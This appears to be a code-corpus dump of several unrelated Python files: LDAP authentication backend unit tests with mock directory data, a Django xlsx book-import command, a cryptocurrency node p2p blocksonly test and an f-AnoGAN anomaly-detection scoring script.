mock_user_res = (ldap.RES_SEARCH_RESULT, [(user_dn, LDAPAuthenticationBackendTestCase.directory[user_dn])])
groupname = 'invalid_group'
group_dn = 'cn={groupname},ou=groups,dc=example,dc=com'.format(groupname=groupname)
mock_group_res_id = 9999
mock_group_res = (ldap.RES_SEARCH_RESULT, None)
user = {"base_dn": "ou=users,dc=example,dc=com", "search_filter": "(uid={username})", "scope": "onelevel"}
group = {"base_dn": "ou=groups,dc=example,dc=com", "search_filter": "(&(cn=%s)(memberUid={username}))"%groupname, "scope": "subtree"}
self.ldapobj._search.seed(user["base_dn"], ldap.SCOPE_ONELEVEL, user["search_filter"].format(username=username))(mock_user_res_id)
self.ldapobj._search.seed(group["base_dn"], ldap.SCOPE_SUBTREE, group["search_filter"].format(username=username))(mock_group_res_id)
self.ldapobj._result.seed(mock_user_res_id, all=0)(mock_user_res)
self.ldapobj._result.seed(mock_group_res_id, all=0)(mock_group_res)
result = _do_simple_bind('cn=manager,dc=example,dc=com', 'ldaptest', user_search=user, group_search=group, username=username, password=password)
expected_methods_called = (
self.connect_methods +
['simple_bind_s', 'whoami_s', 'search', 'result', 'result'] +
self.connect_methods +
['simple_bind_s', 'whoami_s', 'unbind', 'search', 'result', 'unbind']
)
self.assertEquals(self.ldapobj.methods_called(), expected_methods_called)
self.assertFalse(result)
def test_search_with_reference_result(self):
# This is for returning the referral object at calling 'result' method of LDAPObject
self.mock_referral = [
(None, ['ldap://fakeldap2.example.com/ou=cyberdyne,dc=example,dc=com']),
]
user = {
"base_dn": "ou=users,dc=example,dc=com",
"search_filter": "(uid={username})",
"scope": "subtree",
}
# This is a case that maximum referral hop will be exceeded
result = _do_simple_bind('', '',
user_search=user, group_search=None,
username='john_connor', password='HastaLavista',
ref_hop_limit=1)
expected_methods_called = (
self.connect_methods +
['simple_bind_s', 'whoami_s', 'search', 'result', 'result', 'result'] +
self.connect_methods +
['simple_bind_s', 'whoami_s', 'unbind', 'unbind']
)
self.assertEquals(self.ldapobj.methods_called(), expected_methods_called)
self.assertTrue(result)
self.assertEqual(len(self.log_handler.messages['warning']), 0)
    def test_search_with_reference_result_but_exceeded_maximum_referral_hop(self):
# This is for returning the referral object at calling 'result' method of LDAPObject
self.mock_referral = [
(None, ['ldap://fakeldap2.example.com/ou=cyberdyne,dc=example,dc=com']),
]
user = {
"base_dn": "ou=users,dc=example,dc=com",
"search_filter": "(uid={username})",
"scope": "subtree",
}
result = _do_simple_bind('', '',
user_search=user, group_search=None,
username='john_connor', password='HastaLavista',
ref_hop_limit=0)
expected_methods_called = (
self.connect_methods +
['simple_bind_s', 'whoami_s', 'search', 'result', 'result', 'result'] +
self.connect_methods +
['simple_bind_s', 'whoami_s', 'unbind', 'unbind']
)
self.assertEquals(self.ldapobj.methods_called(), expected_methods_called)
self.assertTrue(result)
self.assertTrue(len(self.log_handler.messages['warning']) > 0)
self.assertTrue(re.match(r'^Referral hop limit is exceeded',
self.log_handler.messages['warning'][0]))
@mock.patch('st2auth_ldap_backend.ldap_backend.LDAPAuthenticationBackend._get_ldap_search_referral')
def test_search_with_reference_result_but_chase_referrals_false(self, mock_search_referral):
# This is for returning the referral object at calling 'result' method of LDAPObject
self.mock_referral = [
(None, ['ldap://fakeldap2.example.com/ou=cyberdyne,dc=example,dc=com']),
]
user = {
"base_dn": "ou=users,dc=example,dc=com",
"search_filter": "(uid={username})",
"scope": "subtree",
}
# This is a case that will return a reference, but chase_referrals is False
result = _do_simple_bind('', '',
user_search=user, group_search=None,
username='john_connor', password='HastaLavista',
chase_referrals=False)
expected_methods_called = (
self.connect_methods +
['simple_bind_s', 'whoami_s', 'search', 'result', 'result', 'result'] +
self.connect_methods +
['simple_bind_s', 'whoami_s', 'unbind', 'unbind']
)
self.assertEquals(self.ldapobj.methods_called(), expected_methods_called)
self.assertTrue(result)
self.assertEqual(len(self.log_handler.messages['warning']), 0)
# ensure that the referral code was never called
mock_search_referral.assert_not_called()
def test_ldap_connect(self):
try:
ldapobj = self.mockldap['ldap://testserver.domain.tld']
result = _do_simple_bind('cn=manager,dc=example,dc=com', 'ldaptest',
uri='ldap://testserver.domain.tld')
self.assertEquals(ldapobj.methods_called(),
self.connect_methods + ['simple_bind_s', 'whoami_s', 'unbind'])
self.assertTrue(result)
finally:
del ldapobj
@mock.patch('st2auth_ldap_backend.ldap_backend.ldap.set_option')
def test_ldap_connect_ldap_start_tls(self, mock_set_option):
try:
ldapobj = self.mockldap['ldap://testserver.domain.tld']
result = _do_simple_bind('cn=manager,dc=example,dc=com', 'ldaptest',
uri='ldap://testserver.domain.tld',
use_tls=True)
self.assertEquals(ldapobj.methods_called(),
self.connect_methods + ['start_tls_s',
'simple_bind_s', 'whoami_s', 'unbind'])
mock_set_option.assert_has_calls(
[
mock.call(ldap.OPT_X_TLS, ldap.OPT_X_TLS_DEMAND),
mock.call(ldap.OPT_X_TLS_REQUIRE_CERT, ldap.OPT_X_TLS_NEVER),
])
self.assertTrue(result)
finally:
del ldapobj
@mock.patch('st2auth_ldap_backend.ldap_backend.ldap.set_option')
def test_ldap_connect_ldaps(self, mock_set_option):
try:
ldapobj = self.mockldap['ldaps://testserver.domain.tld']
result = _do_simple_bind('cn=manager,dc=example,dc=com', 'ldaptest',
uri='ldaps://testserver.domain.tld')
self.assertEquals(ldapobj.methods_called(),
self.connect_methods + ['simple_bind_s', 'whoami_s', 'unbind'])
mock_set_option.assert_has_calls(
[
mock.call(ldap.OPT_X_TLS_REQUIRE_CERT, ldap.OPT_X_TLS_NEVER),
])
self.assertTrue(result)
finally:
del ldapobj
def _do_simple_bind(bind_dn, bind_pw, uri=DEFAULT_URI, user_search=None, group_search=None, username=None, password=None, ref_hop_limit=0, chase_referrals=True, use_tls=False):
backend = LDAPAuthenticationBackend(uri, use_tls=use_tls, bind_dn=bind_dn, bind_pw=bind_pw, user=user_search, group=group_search, ref_hop_limit=ref_hop_limit, chase_referrals=chase_referrals)
return backend.authenticate(username, password)
if __name__ == '__main__':
sys.exit(unittest2.main())
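For orientation, a minimal sketch of what `_do_simple_bind` above wires together, using the same `LDAPAuthenticationBackend` keyword arguments and mock-directory credentials exercised by these tests (illustrative, not an additional test case):

```python
backend = LDAPAuthenticationBackend(
    'ldap://fakeldap.example.com/',
    use_tls=False,
    bind_dn='cn=manager,dc=example,dc=com',
    bind_pw='ldaptest',
    user={'base_dn': 'ou=users,dc=example,dc=com',
          'search_filter': '(uid={username})',
          'scope': 'onelevel'},
    group=None,
    ref_hop_limit=0,
    chase_referrals=True,
)
assert backend.authenticate('sarah_connor', 'Reece4ever')
```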
| 45.81106
| 195
| 0.63228
|
import ldap
import logging
import os
import re
import sys
import unittest2
import mock
from mockldap import MockLdap
from mockldap.recording import RecordedMethod
from st2auth_ldap_backend import ldap_backend
from st2auth_ldap_backend.ldap_backend import LDAPAuthenticationBackend
BASE_DIR = os.path.dirname(os.path.abspath(__file__))
DEFAULT_URI = 'ldap://fakeldap.example.com/'
class LDAPAuthenticationBackendTestCase(unittest2.TestCase):
connect_methods = ['initialize', 'set_option', 'set_option']
directory = {
'dc=com': {'dc': ['com']},
'dc=example,dc=com': {'dc': ['example']},
'ou=users,dc=example,dc=com': {'ou': ['users'], 'objectClass': ['groupOfNames'], 'member': ['uid=sarah_connor,ou=users,dc=example,dc=com', 'uid=john_connor,ou=users,dc=example,dc=com']},
'cn=manager,dc=example,dc=com': {'cn': ['manager'], 'userPassword': ['ldaptest']},
'uid=sarah_connor,ou=users,dc=example,dc=com': { 'uid': ['sarah_connor'], 'userPassword': ['Reece4ever'], 'objectclass': ['inetOrgPerson', 'posixAccount', 'person', 'top'] },
'uid=john_connor,ou=users,dc=example,dc=com': { 'uid': ['john_connor'], 'userPassword': ['HastaLavista'], 'objectclass': ['inetOrgPerson', 'posixAccount', 'person', 'top'] },
'cn=resistance,ou=groups,dc=example,dc=com': { 'cn': ['resistance'], 'description': ['memberOf'], 'memberuid': ['sarah_connor', 'john_connor'], 'objectclass': ['posixGroup', 'top']}
}
@classmethod
def setUpClass(cls):
cls.mockldap = MockLdap(cls.directory)
@classmethod
def tearDownClass(cls):
del cls.mockldap
def setUp(self):
self.mockldap.start()
self.ldapobj = self.mockldap['ldap://fakeldap.example.com/']
self.mock_referral = []
self.ldapobj._result = self.ldapobj.result
def side_effect_result(*args, **kwargs):
def result(ldapobj, msgid, all):
if all:
return (ldap.RES_SEARCH_RESULT, self._sync_results)
else:
if self._sync_results:
return (ldap.RES_SEARCH_ENTRY, [self._sync_results.pop()])
elif self.mock_referral:
return (ldap.RES_SEARCH_REFERENCE, [self.mock_referral.pop()])
else:
return (ldap.RES_SEARCH_RESULT, None)
            if self._sync_results is None:
self._sync_results = self.ldapobj._result(*args, **kwargs)[1]
return result(self.ldapobj, *args, **kwargs)
else:
return RecordedMethod(result, self.ldapobj)(*args, **kwargs)
self.ldapobj.result = mock.Mock(side_effect=side_effect_result)
self.ldapobj._search = self.ldapobj.search
def side_effect_search(*args, **kwargs):
self._sync_results = None
return self.ldapobj._search(*args, **kwargs)
self.ldapobj.search = mock.Mock(side_effect=side_effect_search)
class LogHandler(logging.StreamHandler):
def __init__(self, *args, **kwargs):
self.reset()
logging.StreamHandler.__init__(self, *args, **kwargs)
def emit(self, record):
self.messages[record.levelname.lower()].append(record.getMessage())
def reset(self):
self.messages = {
'debug': [],
'info': [],
'warning': [],
'error': [],
'critical': [],
}
self.log_handler = LogHandler()
ldap_backend.LOG.addHandler(self.log_handler)
def tearDown(self):
self.mockldap.stop()
del self.ldapobj
def test_bind_anonymous(self):
result = _do_simple_bind('', '')
self.assertEquals(self.ldapobj.methods_called(), self.connect_methods + ['simple_bind_s', 'whoami_s', 'unbind'])
self.assertTrue(result)
def test_bind_dn_valid(self):
result = _do_simple_bind('cn=manager,dc=example,dc=com', 'ldaptest')
self.assertEquals(self.ldapobj.methods_called(), self.connect_methods + ['simple_bind_s', 'whoami_s', 'unbind'])
self.assertTrue(result)
def test_bind_dn_invalid_user(self):
result = _do_simple_bind('uid=invalid_user,ou=users,dc=example,dc=com', 'none')
self.assertEquals(self.ldapobj.methods_called(), self.connect_methods + ['simple_bind_s', 'unbind'])
self.assertFalse(result)
def test_bind_dn_invalid_password(self):
result = _do_simple_bind('cn=manager,dc=example,dc=com', 'invalid_password')
self.assertEquals(self.ldapobj.methods_called(), self.connect_methods + ['simple_bind_s', 'unbind'])
self.assertFalse(result)
def test_search_valid_username(self):
username = 'sarah_connor'
password = 'Reece4ever'
user_dn = 'uid={},ou=users,dc=example,dc=com'.format(username)
mock_res = (user_dn, LDAPAuthenticationBackendTestCase.directory[user_dn])
user = {"base_dn": "ou=users,dc=example,dc=com", "search_filter": "(uid={username})", "scope": "onelevel"}
self.ldapobj.search_s.seed(user["base_dn"], ldap.SCOPE_ONELEVEL, user["search_filter"].format(username=username))([mock_res])
result = _do_simple_bind('cn=manager,dc=example,dc=com', 'ldaptest', user_search=user, group_search=None, username=username, password=password)
expected_methods_called = (
self.connect_methods +
['simple_bind_s', 'whoami_s', 'search', 'result', 'result'] +
self.connect_methods +
['simple_bind_s', 'whoami_s', 'unbind', 'unbind']
)
self.assertEquals(self.ldapobj.methods_called(), expected_methods_called)
self.assertTrue(result)
def test_search_invalid_username(self):
username = 'invalid_username'
password = 'Reece4ever'
user = {"base_dn": "ou=users,dc=example,dc=com", "search_filter": "(uid={username})", "scope": "onelevel"}
mock_res = []
self.ldapobj.search_s.seed(user["base_dn"], ldap.SCOPE_ONELEVEL, user["search_filter"].format(username=username))(mock_res)
result = _do_simple_bind('cn=manager,dc=example,dc=com', 'ldaptest', user_search=user, group_search=None, username=username, password=password)
expected_methods_called = (
self.connect_methods +
['simple_bind_s', 'whoami_s', 'search', 'result', 'unbind']
)
self.assertEquals(self.ldapobj.methods_called(), expected_methods_called)
self.assertFalse(result)
def test_search_invalid_password(self):
username = 'sarah_connor'
password = 'bad_password'
user = {"base_dn": "ou=users,dc=example,dc=com", "search_filter": "(uid={username})", "scope": "onelevel"}
mock_res_id = 1234
mock_res = (ldap.RES_SEARCH_RESULT, None)
self.ldapobj._search.seed(user["base_dn"], ldap.SCOPE_ONELEVEL, user["search_filter"].format(username=username))(mock_res_id)
self.ldapobj._result.seed(mock_res_id, all=0)(mock_res)
result = _do_simple_bind('cn=manager,dc=example,dc=com', 'ldaptest', user_search=user, group_search=None, username=username, password=password)
expected_methods_called = (
self.connect_methods +
['simple_bind_s', 'whoami_s', 'search', 'result', 'unbind']
)
self.assertEquals(self.ldapobj.methods_called(), expected_methods_called)
self.assertFalse(result)
def test_search_valid_username_valid_group(self):
username = 'john_connor'
password = 'HastaLavista'
user_dn = 'uid={},ou=users,dc=example,dc=com'.format(username)
mock_user_res_id = 1234
mock_user_res = (ldap.RES_SEARCH_RESULT, [(user_dn, LDAPAuthenticationBackendTestCase.directory[user_dn])])
groupname = 'resistance'
group_dn = 'cn={groupname},ou=groups,dc=example,dc=com'.format(groupname=groupname)
mock_group_res_id = 9999
mock_group_res = (ldap.RES_SEARCH_RESULT, [(group_dn, LDAPAuthenticationBackendTestCase.directory[group_dn])])
user = {"base_dn": "ou=users,dc=example,dc=com", "search_filter": "(uid={username})", "scope": "onelevel"}
group = {"base_dn": "ou=groups,dc=example,dc=com", "search_filter": "(&(cn=%s)(memberUid={username}))"%groupname, "scope": "subtree"}
self.ldapobj._search.seed(user["base_dn"], ldap.SCOPE_ONELEVEL, user["search_filter"].format(username=username))(mock_user_res_id)
self.ldapobj._search.seed(group["base_dn"], ldap.SCOPE_SUBTREE, group["search_filter"].format(username=username))(mock_group_res_id)
self.ldapobj._result.seed(mock_user_res_id, all=0)(mock_user_res)
self.ldapobj._result.seed(mock_group_res_id, all=0)(mock_group_res)
result = _do_simple_bind('cn=manager,dc=example,dc=com', 'ldaptest', user_search=user, group_search=group, username=username, password=password)
expected_methods_called = (
self.connect_methods +
['simple_bind_s', 'whoami_s', 'search', 'result', 'result'] +
self.connect_methods +
['simple_bind_s', 'whoami_s', 'unbind', 'search', 'result', 'result', 'unbind']
)
self.assertEquals(self.ldapobj.methods_called(), expected_methods_called)
self.assertTrue(result)
def test_search_valid_username_invalid_group(self):
username = 'john_connor'
password = 'HastaLavista'
user_dn = 'uid={},ou=users,dc=example,dc=com'.format(username)
mock_user_res_id = 1234
mock_user_res = (ldap.RES_SEARCH_RESULT, [(user_dn, LDAPAuthenticationBackendTestCase.directory[user_dn])])
groupname = 'invalid_group'
group_dn = 'cn={groupname},ou=groups,dc=example,dc=com'.format(groupname=groupname)
mock_group_res_id = 9999
mock_group_res = (ldap.RES_SEARCH_RESULT, None)
user = {"base_dn": "ou=users,dc=example,dc=com", "search_filter": "(uid={username})", "scope": "onelevel"}
group = {"base_dn": "ou=groups,dc=example,dc=com", "search_filter": "(&(cn=%s)(memberUid={username}))"%groupname, "scope": "subtree"}
self.ldapobj._search.seed(user["base_dn"], ldap.SCOPE_ONELEVEL, user["search_filter"].format(username=username))(mock_user_res_id)
self.ldapobj._search.seed(group["base_dn"], ldap.SCOPE_SUBTREE, group["search_filter"].format(username=username))(mock_group_res_id)
self.ldapobj._result.seed(mock_user_res_id, all=0)(mock_user_res)
self.ldapobj._result.seed(mock_group_res_id, all=0)(mock_group_res)
result = _do_simple_bind('cn=manager,dc=example,dc=com', 'ldaptest', user_search=user, group_search=group, username=username, password=password)
expected_methods_called = (
self.connect_methods +
['simple_bind_s', 'whoami_s', 'search', 'result', 'result'] +
self.connect_methods +
['simple_bind_s', 'whoami_s', 'unbind', 'search', 'result', 'unbind']
)
self.assertEquals(self.ldapobj.methods_called(), expected_methods_called)
self.assertFalse(result)
def test_search_with_reference_result(self):
self.mock_referral = [
(None, ['ldap://fakeldap2.example.com/ou=cyberdyne,dc=example,dc=com']),
]
user = {
"base_dn": "ou=users,dc=example,dc=com",
"search_filter": "(uid={username})",
"scope": "subtree",
}
result = _do_simple_bind('', '',
user_search=user, group_search=None,
username='john_connor', password='HastaLavista',
ref_hop_limit=1)
expected_methods_called = (
self.connect_methods +
['simple_bind_s', 'whoami_s', 'search', 'result', 'result', 'result'] +
self.connect_methods +
['simple_bind_s', 'whoami_s', 'unbind', 'unbind']
)
self.assertEquals(self.ldapobj.methods_called(), expected_methods_called)
self.assertTrue(result)
self.assertEqual(len(self.log_handler.messages['warning']), 0)
    def test_search_with_reference_result_but_exceeded_maximum_referral_hop(self):
self.mock_referral = [
(None, ['ldap://fakeldap2.example.com/ou=cyberdyne,dc=example,dc=com']),
]
user = {
"base_dn": "ou=users,dc=example,dc=com",
"search_filter": "(uid={username})",
"scope": "subtree",
}
result = _do_simple_bind('', '',
user_search=user, group_search=None,
username='john_connor', password='HastaLavista',
ref_hop_limit=0)
expected_methods_called = (
self.connect_methods +
['simple_bind_s', 'whoami_s', 'search', 'result', 'result', 'result'] +
self.connect_methods +
['simple_bind_s', 'whoami_s', 'unbind', 'unbind']
)
self.assertEquals(self.ldapobj.methods_called(), expected_methods_called)
self.assertTrue(result)
self.assertTrue(len(self.log_handler.messages['warning']) > 0)
self.assertTrue(re.match(r'^Referral hop limit is exceeded',
self.log_handler.messages['warning'][0]))
@mock.patch('st2auth_ldap_backend.ldap_backend.LDAPAuthenticationBackend._get_ldap_search_referral')
def test_search_with_reference_result_but_chase_referrals_false(self, mock_search_referral):
self.mock_referral = [
(None, ['ldap://fakeldap2.example.com/ou=cyberdyne,dc=example,dc=com']),
]
user = {
"base_dn": "ou=users,dc=example,dc=com",
"search_filter": "(uid={username})",
"scope": "subtree",
}
result = _do_simple_bind('', '',
user_search=user, group_search=None,
username='john_connor', password='HastaLavista',
chase_referrals=False)
expected_methods_called = (
self.connect_methods +
['simple_bind_s', 'whoami_s', 'search', 'result', 'result', 'result'] +
self.connect_methods +
['simple_bind_s', 'whoami_s', 'unbind', 'unbind']
)
self.assertEquals(self.ldapobj.methods_called(), expected_methods_called)
self.assertTrue(result)
self.assertEqual(len(self.log_handler.messages['warning']), 0)
mock_search_referral.assert_not_called()
def test_ldap_connect(self):
try:
ldapobj = self.mockldap['ldap://testserver.domain.tld']
result = _do_simple_bind('cn=manager,dc=example,dc=com', 'ldaptest',
uri='ldap://testserver.domain.tld')
self.assertEquals(ldapobj.methods_called(),
self.connect_methods + ['simple_bind_s', 'whoami_s', 'unbind'])
self.assertTrue(result)
finally:
del ldapobj
@mock.patch('st2auth_ldap_backend.ldap_backend.ldap.set_option')
def test_ldap_connect_ldap_start_tls(self, mock_set_option):
try:
ldapobj = self.mockldap['ldap://testserver.domain.tld']
result = _do_simple_bind('cn=manager,dc=example,dc=com', 'ldaptest',
uri='ldap://testserver.domain.tld',
use_tls=True)
self.assertEquals(ldapobj.methods_called(),
self.connect_methods + ['start_tls_s',
'simple_bind_s', 'whoami_s', 'unbind'])
mock_set_option.assert_has_calls(
[
mock.call(ldap.OPT_X_TLS, ldap.OPT_X_TLS_DEMAND),
mock.call(ldap.OPT_X_TLS_REQUIRE_CERT, ldap.OPT_X_TLS_NEVER),
])
self.assertTrue(result)
finally:
del ldapobj
@mock.patch('st2auth_ldap_backend.ldap_backend.ldap.set_option')
def test_ldap_connect_ldaps(self, mock_set_option):
try:
ldapobj = self.mockldap['ldaps://testserver.domain.tld']
result = _do_simple_bind('cn=manager,dc=example,dc=com', 'ldaptest',
uri='ldaps://testserver.domain.tld')
self.assertEquals(ldapobj.methods_called(),
self.connect_methods + ['simple_bind_s', 'whoami_s', 'unbind'])
mock_set_option.assert_has_calls(
[
mock.call(ldap.OPT_X_TLS_REQUIRE_CERT, ldap.OPT_X_TLS_NEVER),
])
self.assertTrue(result)
finally:
del ldapobj
def _do_simple_bind(bind_dn, bind_pw, uri=DEFAULT_URI, user_search=None, group_search=None, username=None, password=None, ref_hop_limit=0, chase_referrals=True, use_tls=False):
backend = LDAPAuthenticationBackend(uri, use_tls=use_tls, bind_dn=bind_dn, bind_pw=bind_pw, user=user_search, group=group_search, ref_hop_limit=ref_hop_limit, chase_referrals=chase_referrals)
return backend.authenticate(username, password)
if __name__ == '__main__':
sys.exit(unittest2.main())
| true
| true
|
1c493b5eb5539f3e0d4794d929c482d9fe3c4bc4
| 562
|
py
|
Python
|
books/management/commands/xlsx_books_import.py
|
cnlis/lib_books
|
05bed0f9775826e0b1f968a766ddf5c2d1d55f40
|
[
"MIT"
] | null | null | null |
books/management/commands/xlsx_books_import.py
|
cnlis/lib_books
|
05bed0f9775826e0b1f968a766ddf5c2d1d55f40
|
[
"MIT"
] | null | null | null |
books/management/commands/xlsx_books_import.py
|
cnlis/lib_books
|
05bed0f9775826e0b1f968a766ddf5c2d1d55f40
|
[
"MIT"
] | null | null | null |
import os
from django.core.management.base import BaseCommand, CommandError
from books.parsers.books_import import books_saver
from books.parsers.xlsx_import_export import xlsx_read
class Command(BaseCommand):
def add_arguments(self, parser):
parser.add_argument('file', type=str)
def handle(self, *args, **options):
file_path = options['file']
        if not os.path.exists(file_path):
            raise CommandError(f'file {file_path} doesn\'t exist')
books = xlsx_read(file_path, 7)
books_saver(books, 'ФПУ')
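As a usage note: a management command like this one can be invoked programmatically as well as from the shell. A minimal sketch (assuming the `books` app is in `INSTALLED_APPS` and the workbook path exists):

```python
from django.core.management import call_command

# Equivalent to: python manage.py xlsx_books_import books.xlsx
call_command('xlsx_books_import', 'books.xlsx')
```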
| 29.578947
| 69
| 0.699288
|
import os
from django.core.management.base import BaseCommand, CommandError
from books.parsers.books_import import books_saver
from books.parsers.xlsx_import_export import xlsx_read
class Command(BaseCommand):
def add_arguments(self, parser):
parser.add_argument('file', type=str)
def handle(self, *args, **options):
        file_path = options['file']
        if not os.path.exists(file_path):
            raise CommandError(f'file {file_path} doesn\'t exist')
books = xlsx_read(file_path, 7)
books_saver(books, 'ФПУ')
| true
| true
|
1c493bdf953ce763337d874af9e7af5c511847cd
| 2,443
|
py
|
Python
|
test/functional/p2p_blocksonly.py
|
aentan/ain
|
1d6db33159de1c8c7930d29a0ab0902f42b728c1
|
[
"MIT"
] | null | null | null |
test/functional/p2p_blocksonly.py
|
aentan/ain
|
1d6db33159de1c8c7930d29a0ab0902f42b728c1
|
[
"MIT"
] | null | null | null |
test/functional/p2p_blocksonly.py
|
aentan/ain
|
1d6db33159de1c8c7930d29a0ab0902f42b728c1
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
# Copyright (c) 2019 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test p2p blocksonly"""
from test_framework.messages import msg_tx, CTransaction, FromHex
from test_framework.mininode import P2PInterface
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import assert_equal
class P2PBlocksOnly(BitcoinTestFramework):
def set_test_params(self):
self.setup_clean_chain = False
self.num_nodes = 1
self.extra_args = [["-blocksonly"]]
def run_test(self):
self.nodes[0].add_p2p_connection(P2PInterface())
self.log.info('Check that txs from p2p are rejected')
prevtx = self.nodes[0].getblock(self.nodes[0].getblockhash(1), 2)['tx'][0]
rawtx = self.nodes[0].createrawtransaction(
inputs=[{
'txid': prevtx['txid'],
'vout': 0
}],
outputs=[{
self.nodes[0].get_genesis_keys().operatorAuthAddress: 50 - 0.00125
}],
)
sigtx = self.nodes[0].signrawtransactionwithkey(
hexstring=rawtx,
privkeys=[self.nodes[0].get_genesis_keys().operatorPrivKey],
prevtxs=[{
'txid': prevtx['txid'],
'vout': 0,
'scriptPubKey': prevtx['vout'][0]['scriptPubKey']['hex'],
}],
)['hex']
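        # With -blocksonly, the node turns off local transaction relay, so an
        # unsolicited tx pushed by a peer violates the negotiated protocol.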
assert_equal(self.nodes[0].getnetworkinfo()['localrelay'], False)
with self.nodes[0].assert_debug_log(['transaction sent in violation of protocol peer=0']):
self.nodes[0].p2p.send_message(msg_tx(FromHex(CTransaction(), sigtx)))
self.nodes[0].p2p.sync_with_ping()
assert_equal(self.nodes[0].getmempoolinfo()['size'], 0)
self.log.info('Check that txs from rpc are not rejected and relayed to other peers')
assert_equal(self.nodes[0].getpeerinfo()[0]['relaytxes'], True)
txid = self.nodes[0].testmempoolaccept([sigtx])[0]['txid']
with self.nodes[0].assert_debug_log(['received getdata for: tx {} peer=0'.format(txid)]):
self.nodes[0].sendrawtransaction(sigtx)
self.nodes[0].p2p.wait_for_tx(txid)
assert_equal(self.nodes[0].getmempoolinfo()['size'], 1)
if __name__ == '__main__':
P2PBlocksOnly().main()
| 41.40678
| 98
| 0.630782
|
from test_framework.messages import msg_tx, CTransaction, FromHex
from test_framework.mininode import P2PInterface
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import assert_equal
class P2PBlocksOnly(BitcoinTestFramework):
def set_test_params(self):
self.setup_clean_chain = False
self.num_nodes = 1
self.extra_args = [["-blocksonly"]]
def run_test(self):
self.nodes[0].add_p2p_connection(P2PInterface())
self.log.info('Check that txs from p2p are rejected')
prevtx = self.nodes[0].getblock(self.nodes[0].getblockhash(1), 2)['tx'][0]
rawtx = self.nodes[0].createrawtransaction(
inputs=[{
'txid': prevtx['txid'],
'vout': 0
}],
outputs=[{
self.nodes[0].get_genesis_keys().operatorAuthAddress: 50 - 0.00125
}],
)
sigtx = self.nodes[0].signrawtransactionwithkey(
hexstring=rawtx,
privkeys=[self.nodes[0].get_genesis_keys().operatorPrivKey],
prevtxs=[{
'txid': prevtx['txid'],
'vout': 0,
'scriptPubKey': prevtx['vout'][0]['scriptPubKey']['hex'],
}],
)['hex']
assert_equal(self.nodes[0].getnetworkinfo()['localrelay'], False)
with self.nodes[0].assert_debug_log(['transaction sent in violation of protocol peer=0']):
self.nodes[0].p2p.send_message(msg_tx(FromHex(CTransaction(), sigtx)))
self.nodes[0].p2p.sync_with_ping()
assert_equal(self.nodes[0].getmempoolinfo()['size'], 0)
self.log.info('Check that txs from rpc are not rejected and relayed to other peers')
assert_equal(self.nodes[0].getpeerinfo()[0]['relaytxes'], True)
txid = self.nodes[0].testmempoolaccept([sigtx])[0]['txid']
with self.nodes[0].assert_debug_log(['received getdata for: tx {} peer=0'.format(txid)]):
self.nodes[0].sendrawtransaction(sigtx)
self.nodes[0].p2p.wait_for_tx(txid)
assert_equal(self.nodes[0].getmempoolinfo()['size'], 1)
if __name__ == '__main__':
P2PBlocksOnly().main()
| true
| true
|
1c493be0790b14fa3c6b8005e3c441951a283582
| 1,373
|
py
|
Python
|
fanogan/test_anomaly_detection.py
|
A03ki/f-AnoGAN
|
c431034f818c9c9577c0ecac5d9390a9293c4661
|
[
"MIT"
] | 41
|
2020-04-17T06:37:00.000Z
|
2022-03-21T10:58:20.000Z
|
fanogan/test_anomaly_detection.py
|
A03ki/f-AnoGAN
|
c431034f818c9c9577c0ecac5d9390a9293c4661
|
[
"MIT"
] | 3
|
2020-11-25T14:06:59.000Z
|
2022-03-31T13:01:09.000Z
|
20) AnoGAN,f-AnoGAN/f-AnoGAN/fanogan/test_anomaly_detection.py
|
LEE-SEON-WOO/Deep_Learning_Zero_to_Gan
|
fecd9672f8f216e2d9ee618b2a03ed6b6d2fa3ba
|
[
"MIT"
] | 18
|
2020-04-16T09:23:11.000Z
|
2022-03-27T15:45:30.000Z
|
import torch
import torch.nn as nn
from torch.utils.model_zoo import tqdm
def test_anomaly_detection(opt, generator, discriminator, encoder,
dataloader, device, kappa=1.0):
generator.load_state_dict(torch.load("results/generator"))
discriminator.load_state_dict(torch.load("results/discriminator"))
encoder.load_state_dict(torch.load("results/encoder"))
generator.to(device).eval()
discriminator.to(device).eval()
encoder.to(device).eval()
criterion = nn.MSELoss()
with open("results/score.csv", "w") as f:
f.write("label,img_distance,anomaly_score,z_distance\n")
for (img, label) in tqdm(dataloader):
real_img = img.to(device)
real_z = encoder(real_img)
fake_img = generator(real_z)
fake_z = encoder(fake_img)
real_feature = discriminator.forward_features(real_img)
fake_feature = discriminator.forward_features(fake_img)
# Scores for anomaly detection
img_distance = criterion(fake_img, real_img)
loss_feature = criterion(fake_feature, real_feature)
anomaly_score = img_distance + kappa * loss_feature
z_distance = criterion(fake_z, real_z)
with open("results/score.csv", "a") as f:
f.write(f"{label.item()},{img_distance},"
f"{anomaly_score},{z_distance}\n")
| 32.690476
| 70
| 0.668609
|
import torch
import torch.nn as nn
from torch.utils.model_zoo import tqdm
def test_anomaly_detection(opt, generator, discriminator, encoder,
dataloader, device, kappa=1.0):
generator.load_state_dict(torch.load("results/generator"))
discriminator.load_state_dict(torch.load("results/discriminator"))
encoder.load_state_dict(torch.load("results/encoder"))
generator.to(device).eval()
discriminator.to(device).eval()
encoder.to(device).eval()
criterion = nn.MSELoss()
with open("results/score.csv", "w") as f:
f.write("label,img_distance,anomaly_score,z_distance\n")
for (img, label) in tqdm(dataloader):
real_img = img.to(device)
real_z = encoder(real_img)
fake_img = generator(real_z)
fake_z = encoder(fake_img)
real_feature = discriminator.forward_features(real_img)
fake_feature = discriminator.forward_features(fake_img)
img_distance = criterion(fake_img, real_img)
loss_feature = criterion(fake_feature, real_feature)
anomaly_score = img_distance + kappa * loss_feature
z_distance = criterion(fake_z, real_z)
with open("results/score.csv", "a") as f:
f.write(f"{label.item()},{img_distance},"
f"{anomaly_score},{z_distance}\n")
| true
| true
|
1c493c2bf3a81a6fac43b70ac6aa4941ba45540e
| 4,950
|
py
|
Python
|
ask-sdk-model/ask_sdk_model/services/list_management/alexa_list.py
|
Signal-Kinetics/alexa-apis-for-python
|
abb8d3dce18a5510c48b215406ed36c024f01495
|
[
"Apache-2.0"
] | 2
|
2021-10-30T06:52:48.000Z
|
2021-11-16T12:34:16.000Z
|
ask-sdk-model/ask_sdk_model/services/list_management/alexa_list.py
|
Signal-Kinetics/alexa-apis-for-python
|
abb8d3dce18a5510c48b215406ed36c024f01495
|
[
"Apache-2.0"
